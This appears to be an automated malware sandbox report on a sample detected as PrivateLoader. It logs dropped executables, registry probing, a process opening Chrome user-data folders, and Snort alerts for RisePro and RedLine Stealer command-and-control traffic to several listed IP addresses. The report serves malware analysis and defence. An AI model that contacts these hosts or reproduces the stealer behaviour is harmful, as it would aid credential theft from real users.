Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831$+ source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ue source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdbDC source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb.ookies\ source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb.batory source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\8F82.exe source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2044956338.0000024C2EF9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb* source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2029399466.000000000857D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.load.error( source: AppLaunch.exe, 00000009.00000002.2026868148.0000000008377000.00000004.00000020.00020000.00000000.sdmp

Spreading

Yara detected PrivateLoader

Source: Yara match	File source: 9.2.AppLaunch.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.1031000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.1031000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2013665902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\D9EC.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ShaderCache\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\SafetyTips\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\	Jump to behavior

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00FC2390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_004C2390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	Code function: 2_2_00ED2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	2_2_00ED2390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	Code function: 3_2_00905322 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00905322

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0C8C127Fh	5_2_0C8C0F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0C8C3177h	5_2_0C8C1F18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0C8C49BDh	5_2_0C8C4500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_0C8C0118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 4x nop then jmp 0C8C3177h	5_2_0C8C2EA5

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 194.49.94.145 80
Source: C:\Windows\explorer.exe	Network Connect: 194.49.94.210 80
Source: C:\Windows\explorer.exe	Network Connect: 194.49.94.120 80
Source: C:\Windows\explorer.exe	Network Connect: 5.42.65.80 80
Source: C:\Windows\explorer.exe	Network Connect: 185.196.9.161 80
Source: C:\Windows\explorer.exe	Network Connect: 194.49.94.72 80

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Token) 194.49.94.152:50500 -> 192.168.2.4:49729
Source: Traffic	Snort IDS: 2049060 ET TROJAN Suspected RisePro TCP Heartbeat Packet 192.168.2.4:49729 -> 194.49.94.152:50500
Source: Traffic	Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (External IP) 194.49.94.152:50500 -> 192.168.2.4:49729
Source: Traffic	Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.4:49730 -> 194.49.94.152:19053
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49730 -> 194.49.94.152:19053
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 194.49.94.152:19053 -> 192.168.2.4:49730
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Activity) 192.168.2.4:49729 -> 194.49.94.152:50500
Source: Traffic	Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.4:49738 -> 194.169.175.235:42691
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49738 -> 194.169.175.235:42691
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 194.169.175.235:42691 -> 192.168.2.4:49738
Source: Traffic	Snort IDS: 2046056 ET TROJAN Redline Stealer Activity (Response) 194.169.175.235:42691 -> 192.168.2.4:49738

Yara detected PrivateLoader

Source: Yara match	File source: 9.2.AppLaunch.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.1031000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.1031000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2013665902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found Tor onion address

Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp

